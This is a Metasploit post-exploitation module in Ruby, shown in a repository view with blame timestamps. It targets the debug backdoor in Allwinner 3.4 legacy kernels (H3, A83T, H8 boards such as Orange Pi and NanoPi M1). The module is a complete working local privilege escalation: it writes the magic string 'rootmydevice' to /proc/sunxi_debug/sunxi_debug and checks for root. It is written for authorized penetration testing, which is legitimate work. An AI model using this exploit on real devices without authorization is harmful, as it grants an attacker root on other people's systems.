metasploit-framework/modules/post/multi/escalate/allwinner_backdoor.rb

66 lines
2.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-05-18 01:58:32 +00:00
require "msf/core"
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
def initialize(info={})
super( update_info( info,
2016-05-18 01:58:32 +00:00
"Name" => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
"Description" => %q{
2016-05-18 02:07:33 +00:00
This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices.
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
},
2016-05-18 01:58:32 +00:00
"License" => MSF_LICENSE,
"Author" =>
[
2016-05-18 01:58:32 +00:00
"h00die <mike@stcyrsecurity.com>", # Module
"KotCzarny" # Discovery
],
2016-05-18 01:58:32 +00:00
"Platform" => [ "android", "linux" ],
"DisclosureDate" => "Apr 30 2016",
"References" =>
[
2016-05-18 01:58:32 +00:00
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
],
2016-05-18 01:58:32 +00:00
"SessionTypes" => [ "shell", "meterpreter" ]
))
end
def run
2016-05-18 01:58:32 +00:00
backdoor = "/proc/sunxi_debug/sunxi_debug"
if file_exist?(backdoor)
2016-05-18 01:58:32 +00:00
vprint_good "Backdoor found, exploiting."
cmd_exec("echo rootmydevice > #{backdoor}")
if is_root?
2016-05-18 01:58:32 +00:00
print_good "Privilege Escalation Successful"
report_note(
:host => session,
2016-05-18 01:58:32 +00:00
:type => "host.escalation",
:data => "Escalated to root shell via backdoor"
)
else
2016-05-18 01:58:32 +00:00
print_error "Privilege Escalation FAILED"
end
else
2016-05-18 01:58:32 +00:00
print_error "Backdoor #{backdoor} not found."
end
end
end